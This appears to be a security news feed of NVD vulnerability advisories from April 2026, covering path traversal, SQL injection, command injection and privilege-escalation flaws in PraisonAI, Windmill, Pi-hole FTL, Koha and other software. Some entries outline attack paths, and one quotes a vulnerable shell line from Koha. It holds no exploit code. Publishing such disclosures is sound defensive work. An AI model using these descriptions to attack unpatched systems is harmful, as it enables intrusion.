2026-04-07
2026-04-07 17:16Z
CRIT

CVE-2026-39305 — PraisonAI: Prior to 1.5.113, the Action Orchestrator feature contains a Path Traversal vulnerability that allows

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-39305

PraisonAI is a multi-agent teams system. Prior to 1.5.113, the Action Orchestrator feature contains a Path Traversal vulnerability that allows an attacker (or compromised agent) to write to arbitrary files outside of the configured workspace directory. By supplying relative path segments (../) in the target path, malicious actions can overwrite sensitive system files or drop executable payloads on the host. This vulnerability is fixed in 1.5.113. CVSSv3.1 9.0 (CRITICAL)

CWECWE 22VNDPraisonaiTYPVulnerability
9.0
CVSS v3.1
95
Edit Score
2026-04-07
2026-04-07 17:16Z
CRIT

CVE-2026-35614 — Frappe Frappe: Prior to 16.14.0 and 15.104.0, Frappe has a SQL injection in bulk_update.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35614

Frappe is a full-stack web application framework. Prior to 16.14.0 and 15.104.0, Frappe has a SQL injection in bulk_update. This vulnerability is fixed in 16.14.0 and 15.104.0. CVSSv3.1 9.8 (CRITICAL)

CWECWE 89VNDFrappeTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 17:16Z
HIGH

CVE-2026-35610 — PolarLearn: In 0-PRERELEASE-14 and earlier, setCustomPassword(userId, password) and deleteUser(userId) in the account-management module used an

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35610

PolarLearn is a free and open-source learning program. In 0-PRERELEASE-14 and earlier, setCustomPassword(userId, password) and deleteUser(userId) in the account-management module used an inverted admin check. Because of the inverted condition, authenticated non-admin users were allowed to execute both actions, while real admins were rejected. This is a direct privilege-escalation issue in the application. CVSSv3.1 8.8 (HIGH)

CWECWE 285VNDPolarlearnTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 17:16Z
HIGH

CVE-2026-35607 — File: Prior to 2.63.1, the fix in commit b6a4fb1 ("self-registered users don't get execute perms")

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35607

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.1, the fix in commit b6a4fb1 ("self-registered users don't get execute perms") stripped Execute permission and Commands from users created via the signup handler. The same fix was not applied to the proxy auth handler. Users auto-created on first successful proxy-auth login are granted execution capabilities from global default CVSSv3.1 8.1 (HIGH)

CWECWE 269TYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-07
2026-04-07 17:16Z
CRIT

CVE-2026-35580 — Emissary: Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35580

Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0. CVSSv3.1 9.1 (CRITICAL)

CWECWE 77VNDEmissaryTYPVulnerability
9.1
CVSS v3.1
96
Edit Score
2026-04-07
2026-04-07 17:16Z
HIGH

CVE-2026-27314 — Privilege: escalation in Apache Cassandra 5.0 on an mTLS environment using MutualTlsAuthenticator allows a

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-27314

Privilege escalation in Apache Cassandra 5.0 on an mTLS environment using MutualTlsAuthenticator allows a user with only CREATE permission to associate their own certificate identity with an arbitrary role, including a superuser role, and authenticate as that role via ADD IDENTITY. Users are recommended to upgrade to version 5.0.7+, which fixes this issue. CVSSv3.1 8.8 (HIGH)

CWECWE 267TYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 17:16Z
CRIT

CVE-2026-23696 — Windmill: CE and EE versions 1.276.0 through 1.603.2 contain an SQL injection vulnerability in

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-23696

Windmill CE and EE versions 1.276.0 through 1.603.2 contain an SQL injection vulnerability in the folder ownership management functionality that allows authenticated attackers to inject SQL through the owner parameter. An attacker can use the injection to read sensitive data such as the JWT signing secret and administrative user identifiers, forge an administrative token, and then execute arbitrary code via the workflow execution endpoints. CVSSv3.1 9.9 (CRITICAL)

CWECWE 89VNDWindmillTYPVulnerability
9.9
CVSS v3.1
100
Edit Score
728 × 90 / responsive · programmatic ad slot
2026-04-07
2026-04-07 17:16Z
HIGH

CVE-2026-22683 — Nextcloud Flow: Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-22683

Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with the Operator role to perform prohibited entity creation and modification actions via the backend API. Although Operators are documented and priced as unable to create or modify entities, the API does not enforce the Operator restriction on workspace endpoints, allowing an Operator to create and update scripts, flows, apps, and raw_apps. Since Operators can also execut CVSSv3.1 8.8 (HIGH) · EPSS 51th percentile

CWECWE 862VNDWindmillVNDNextcloudTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 17:16Z
CRIT

CVE-2024-36058 — Send: The Send Basket functionality in Koha Library before 23.05.10 is susceptible to Time-Based SQL

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2024-36058

The Send Basket functionality in Koha Library before 23.05.10 is susceptible to Time-Based SQL Injection because it fails to sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users to read arbitrary data from the database. CVSSv3.1 9.8 (CRITICAL)

CWECWE 89VNDSendTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-35521 — FTLDNS: From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35521

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DHCP hosts configuration parameter (dhcp.hosts). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability CVSSv3.1 8.8 (HIGH)

CWECWE 78CWECWE 93VNDFtldnsTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-35520 — FTLDNS: From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35520

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DHCP lease time configuration parameter (dhcp.leaseTime). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulne CVSSv3.1 8.8 (HIGH)

CWECWE 78CWECWE 93VNDFtldnsTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-35519 — FTLDNS: From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35519

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS host record configuration parameter (dns.hostRecord). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulne CVSSv3.1 8.8 (HIGH)

CWECWE 78CWECWE 93VNDFtldnsTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-35518 — FTLDNS: From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35518

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DNS CNAME records configuration parameter (dns.cnameRecords). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This v CVSSv3.1 8.8 (HIGH)

CWECWE 78CWECWE 93VNDFtldnsTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-35517 — FTLDNS: From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35517

FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the upstream DNS servers configuration parameter (dns.upstreams). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This v CVSSv3.1 8.8 (HIGH)

CWECWE 78CWECWE 93VNDFtldnsTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 16:16Z
CRIT

CVE-2026-35490 — Webtechnologies Changedetection: changedetection.io is a free open source web page change detection tool.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35490

changedetection.io is a free open source web page change detection tool. Prior to 0.54.8, the @login_optionally_required decorator is placed before (outer to) @blueprint.route() instead of after it. In Flask, @route() must be the outermost decorator because it registers the function it receives. When the order is reversed, @route() registers the original undecorated function, and the auth wrapper is never in the call chain. This silently disables authentication on these route CVSSv3.1 9.8 (CRITICAL)

CWECWE 863VNDWebtechnologiesTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-35488 — Tandoor: Prior to 2.6.4, RecipeBookViewSet and RecipeBookEntryViewSet use CustomIsShared as an alternative permission class, but

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35488

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.4, RecipeBookViewSet and RecipeBookEntryViewSet use CustomIsShared as an alternative permission class, but CustomIsShared.has_object_permission() returns True for all HTTP methods — including DELETE, PUT, and PATCH — without checking request.method in SAFE_METHODS. Any user who is in the shared list of a RecipeBook can delete or overwrite it, even though shared ac CVSSv3.1 8.1 (HIGH)

CWECWE 749VNDTandoorTYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-07
2026-04-07 16:16Z
CRIT

CVE-2026-33816 — Pgx_project Pgx: Memory-safety vulnerability in github.com/jackc/pgx/v5.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-33816

Memory-safety vulnerability in github.com/jackc/pgx/v5. CVSSv3.1 9.8 (CRITICAL)

VNDPgx ProjectTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 16:16Z
CRIT

CVE-2026-33815 — Pgx_project Pgx: Memory-safety vulnerability in github.com/jackc/pgx/v5.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-33815

Memory-safety vulnerability in github.com/jackc/pgx/v5. CVSSv3.1 9.8 (CRITICAL)

VNDPgx ProjectTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2026-30460 — Thedaylightstudio Fuel_cms: Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE)

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-30460

Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability in the Blocks module. CVSSv3.1 8.8 (HIGH)

CWECWE 94VNDThedaylightstudioVNDDaylightTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-07
2026-04-07 16:16Z
CRIT

CVE-2025-52908 — Samsung Exynos_1280_firmware: Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2025-52908

An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 1 of 2. CVSSv3.1 9.8 (CRITICAL)

CWECWE 120VNDSamsungTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2025-24818 — Nokia: MantaRay NM is vulnerable to an OS command injection vulnerability due to improper

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2025-24818

Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application. CVSSv3.1 8.0 (HIGH)

CWECWE 77VNDNokiaTYPVulnerability
8.0
CVSS v3.1
90
Edit Score
2026-04-07
2026-04-07 16:16Z
HIGH

CVE-2025-24817 — Nokia: MantaRay NM is vulnerable to an OS command injection vulnerability due to improper

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2025-24817

Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application. CVSSv3.1 8.0 (HIGH)

CWECWE 78VNDNokiaTYPVulnerability
8.0
CVSS v3.1
90
Edit Score
2026-04-07
2026-04-07 16:16Z
CRIT

CVE-2024-36057 — Koha: Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2024-36057

Koha Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to remote code execution. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to command injection via shell metacharacters because input data can be controlled by an attacker and is directly included in a system command, i.e., an attack can occur via malicious filenames after uploading a .zip file and clicking Process Images. CVSSv3.1 9.8 (CRITICAL)

CWECWE 94VNDKohaTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-07
2026-04-07 15:44Z
INFO

v2.12.0-rc1

AzureHound releases·github.com

AzureHound v2.12.0-rc1 released with bug fixes including removal of a race condition in unit tests, correction of role filtering logic for listResourceGroupUserAccessAdmins, and expanded collection of AzureContributor role assignments across management groups, resource groups, and subscriptions.

SRFIdentitySRFCloudVNDSpecteropsVNDMicrosoft AzureTYPTool
35
Edit Score
2026-04-07
2026-04-07 15:17Z
HIGH

CVE-2026-5373 — An issue that allowed all-organization administrators to promote accounts to superuser status has been

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-5373

An issue that allowed all-organization administrators to promote accounts to superuser status has been resolved. This is an instance of CWE-269: Improper Privilege Management, and has an estimated CVSS score of CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N (8.1 High). This issue was fixed in version 4.0.260202.0 of the runZero Platform. CVSSv3.1 8.1 (HIGH)

CWECWE 269TYPVulnerability
8.1
CVSS v3.1
91
Edit Score